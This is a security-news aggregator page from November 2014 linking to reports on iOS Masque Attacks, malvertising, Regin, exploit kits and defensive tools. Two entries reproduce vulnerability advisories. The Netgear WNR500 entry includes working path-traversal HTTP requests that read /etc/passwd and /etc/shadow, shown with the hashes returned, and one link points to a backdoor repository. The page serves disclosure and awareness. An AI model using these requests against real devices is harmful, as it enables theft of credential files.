Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

The Other Side of Masque Attacks: Data Encryption Not Found in iOS Apps

November 21, 2014, 2:17 am
$
0
0
Based on our research into the iOS threat Masque Attacks announced last week, Trend Micro researchers have found a new way that malicious apps installed through successful Masque Attacks can pose a threat to iOS devices: by accessing unencrypted data used by legitimate apps.

more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/the-other-side-of-masque-attacks-data-encryption-not-found-in-ios-apps/
Search

PUPs and Java Removal Tools, Oh My

November 21, 2014, 2:20 am
$
0
0
When it comes to online threats, these days website ads could be considered a grey area. For the majority of site owners providing free services or content, they’re good to have because they generate revenue from visits and clicks. For normal site visitors, they (we) have learned to gloss over the ads at best. Regardless of where you stand on ads, they’re everywhere, and they may be here to stay for a long time.

What most internet users may not realize is that ads can be used as doors leading to user systems, thanks to how online criminals have exploited them for their malicious purposes.

more here........https://blog.malwarebytes.org/malvertising-2/2014/11/pups-and-java-removal-tools-oh-my/

IE11 ImmutableApplicationSettings EPM Privilege Escalation

November 21, 2014, 2:22 am
$
0
0
IE11 exposes a shared memory section to all tab process which contains configuration settings, named Immutable Application Settings. This contains settings such as whether protected mode is currently enabled.

The vulnerability is due to a permissive DACL on the section object

more here............https://code.google.com/p/google-security-research/issues/detail?id=95

DoubleDirect – Zimperium Discovers Full-Duplex ICMP Redirect Attacks in the Wild

November 21, 2014, 2:23 am
$
0
0
Zimperium Mobile Security Labs have investigated during the last year a new type of attack technique in the wild being exploited by attackers. Aptly named “DoubleDirect,” this attack technique is a type of “Man-in-the-Middle” attack (MITM) enabling an attacker to redirect a victim’s traffic to the attacker’s device. Once redirected, the attacker can steal credentials and deliver malicious payloads to the victim’s mobile device that can not only quickly infect the device, but also spread throughout a corporate network. - See more at: http://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex-icmp-redirect-attacks-in-the-wild/#sthash.h7Rt1qf7.dpuf

PayPal takes 18 months to patch critical remote code execution hole

November 21, 2014, 11:37 pm
$
0
0
Paypal has closed a remote code execution vulnerability in its service some 18 months after it was reported.

more here........http://www.theregister.co.uk/2014/11/21/paypal_vuln/?mt=1416565446664

CVE-2014-6332 (Internet Explorer) and Exploits Kits

November 22, 2014, 4:24 am
$
0
0
For this CVE referer to :
http://technet.microsoft.com/security/bulletin/MS14-064

The first encounter I had with this CVE in exploit kit, was in the Sweet Orange from the actor pushing DarkShell via KR compromised website.

more here.........http://malware.dontneedcoffee.com/2014/11/cve-2014-6332.html

Santa

November 22, 2014, 4:25 am
$
0
0
A binary whitelisting/blacklisting system for Mac OS X

more here..........https://github.com/google/santa

Attack Vector Linux

November 22, 2014, 4:30 am
$
0
0
For anonymized penetration testing & security auditing. 2 distributions combined
more here........http://turing.slu.edu/~hastint/AttackVector.htm
Search

Detekt

November 22, 2014, 4:31 am
$
0
0
Detekt is a free tool that scans your Windows computer for traces of FinFisher and Hacking Team RCS, commercial surveillance spyware that has been identified to be also used to target and monitor human rights defenders and journalists around the world.

more here.........https://resistsurveillance.org/

Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation

November 22, 2014, 6:38 am
$
0
0
Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation


Vendor: PWI, Inc.
Product web page: http://www.privacyware.com
Affected version: 7.0.30.3


Summary: Privatefirewall multi-layered endpoint security software protects
32 and 64 bit Windows desktops and servers from malware and unauthorized use.
Personal firewall, packet inspection, URL filtering, anti-logger, process
monitor, and application/system behavior modeling and anomaly detection
components stop hackers, spyware, viruses and other forms of malware before
they can cause damage.

Desc: Privatefirewall suffers from an unquoted search path issue impacting
the Core Service 'PFNet' service for Windows deployed as part of Privatefirewall
bundle. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user’s code would execute with the elevated privileges
of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5209
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5209.php


09.11.2014

---


C:\Users\user>sc qc PFNet
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PFNet
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
        LOAD_ORDER_GROUP   : TDI
        TAG                : 0
        DISPLAY_NAME       : Privacyware network service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem


--

C:\Users\user>icacls "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                                 BUILTIN\Administrators:(I)(F)
                                                                 BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


--

Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit

November 22, 2014, 11:48 pm
$
0
0
Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit


Vendor: NETGEAR
Product web page: http://www.netgear.com
Affected version: WNR500 (firmware: 1.0.7.2)

Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home.

Desc: The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources with directory traversal attacks.

Tested on: mini_httpd/1.19 19dec2003


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5208
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php


16.11.2014

--


= 1 =============================================================

GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive

---

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


= 2 =============================================================

GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive

---

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Hacking RFID Payment Cards Made Possible with Android App

November 24, 2014, 3:58 am
$
0
0
We recently encountered a high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits. What is the mechanism behind this, and what is the security risk of RFID payment cards in general?

more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/

The Regin Espionage Toolkit

November 24, 2014, 3:59 am
$
0
0
Regin is the latest in the line of sophisticated espionage toolkits used to target a range of organizations around the world. As already reported, it's one of the more complex pieces of malware around, and just like many of the other toolkits it also has a long history behind it. We first encountered Regin nearly six years ago in early 2009, when we found it hiding on a Windows server in a customer environment in Northern Europe.

more here..........https://www.f-secure.com/weblog/archives/00002766.html

linux-native-backdoors

November 24, 2014, 4:01 am
$
0
0
Repository holding all alternatives of *nix backdoors.

more here.........https://github.com/ulissescastro/linux-native-backdoors

Regin: Top-tier espionage tool enables stealthy surveillance

November 24, 2014, 5:07 am
$
0
0
An advanced spying tool, Regin displays a degree of technical competence rarely seen and has been used in spying operations against governments, infrastructure operators, businesses, researchers, and private individuals.

more here.........http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
Search

Magnitude Exploit Kit Backend Infrastructure Insight - Part II

November 24, 2014, 10:33 am
$
0
0
Welcome back to another edition of “exposing Magnitude exploit-kit internals”! As already mentioned in our previous posts (1st and 2nd), the back-end infrastructure of this highly prevalent Exploit Kit has been revealed to be pretty exciting from the security research point-of-view. With this post, we’ll expose additional features and cool tricks that Magnitude uses, reveal more information about its infrastructure and talk about its implementation in the wild.

more here........http://blog.spiderlabs.com/2014/11/magnitude-exploit-kit-backend-infrastructure-insight-part-ii.html

Sony Pictures hacked, entire computer system reportedly unusable

November 24, 2014, 1:47 pm
$
0
0
Reports that Sony Pictures has been hacked have been trickling in this morning, after a thread appeared on Reddit claiming all computers at the company were offline due to a hack.

more here........http://thenextweb.com/insider/2014/11/24/sony-pictures-hacked-employee-computers-offline/

Regin: Nation-state ownage of GSM networks

November 24, 2014, 1:49 pm
$
0
0
"Beware of Regin, the master! His heart is poisoned. He would be thy bane..."

more here.......http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/

Real HSM Breaches

November 24, 2014, 1:50 pm
$
0
0
Hardware Security Modules (HSMs) are temper-resistant special-purpose computers that protect the most sensitive cryptographic key material in an organisation. They are used for security-critical applications such as electronic payment, PKI, inter-bank transfers, and PIN management in the cash machine network.  At Cryptosense we produce software to audit the application programme interfaces (APIs) of these devices and find security flaws. A natural question is: do these systems really ever suffer breaches? Don’t attacks happen elsewhere?

In this article, we’ll look at two major breaches of critical applications secured by HSMs for which the details have become more or less public, the Dutch Certification Authority (CA) Diginotar, and the payment processor RBS Worldpay.

more here..........http://cryptosense.com/real-hsm-breaches/

Craigslist's Netsol account was compromised, name servers changed

November 24, 2014, 1:51 pm
$
0
0
The craigslist account at one of our registrars was compromised and the NS
records migrated away from their rightful home.  That issue has since been
corrected, but the various caches around the Internet are still holding the
old data.

more here........https://lists.dns-oarc.net/pipermail/dns-operations/2014-November/012479.html
Viewing all 8064 articles
Browse latest View live
Search